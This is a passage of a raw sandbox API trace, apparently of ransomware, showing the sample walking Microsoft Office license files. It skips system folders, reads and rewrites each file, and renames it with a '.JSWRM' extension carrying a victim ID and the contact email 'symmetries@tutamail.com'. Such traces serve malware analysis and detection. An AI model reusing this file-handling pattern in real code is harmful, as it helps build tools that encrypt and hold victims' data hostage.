hHeap=0x1e0000) returned 1 [0112.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0112.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0112.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.161] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0112.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0112.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0112.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.162] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xece2b7d7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xece2b7d7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecf1057a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dca, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Retail-ul-phn.xrm-ms", cAlternateFileName="WO0436~1.XRM")) returned 1 [0112.162] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.162] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.162] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.162] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="windows") returned 1 [0112.162] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.163] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.163] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.163] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.163] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.163] lstrcmpiW (lpString1="WordR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241380, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0112.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0112.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.164] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19914) returned 1 [0112.164] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dc0) returned 0x24c1d0 [0112.164] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dc0, lpOverlapped=0x0) returned 1 [0112.166] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.166] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dc0, lpOverlapped=0x0) returned 1 [0112.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.167] CloseHandle (hObject=0x45c) returned 1 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0112.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0112.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0112.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0112.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0112.168] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecddf29a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecddf29a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xece77c56, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b7f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Trial-pl.xrm-ms", cAlternateFileName="WODBC7~1.XRM")) returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="windows") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="recovery") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.168] lstrcmpiW (lpString1="WordR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0112.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0112.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x241308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0112.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0112.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0112.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0112.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0112.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.169] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11135) returned 1 [0112.169] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b70) returned 0x24c1d0 [0112.170] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b70, lpOverlapped=0x0) returned 1 [0112.172] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.172] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b70, lpOverlapped=0x0) returned 1 [0112.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.172] CloseHandle (hObject=0x45c) returned 1 [0112.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0112.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0112.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0112.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0112.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0112.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0112.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.173] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0112.174] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdb905b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecdb905b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xece51a0a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5189, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Trial-ppd.xrm-ms", cAlternateFileName="WO422C~1.XRM")) returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="windows") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.174] lstrcmpiW (lpString1="WordR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0112.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0112.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0112.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0112.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.175] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20873) returned 1 [0112.175] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5180) returned 0x24c1d0 [0112.175] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5180, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5180, lpOverlapped=0x0) returned 1 [0112.178] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.178] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5180, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5180, lpOverlapped=0x0) returned 1 [0112.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.178] CloseHandle (hObject=0x45c) returned 1 [0112.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0112.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 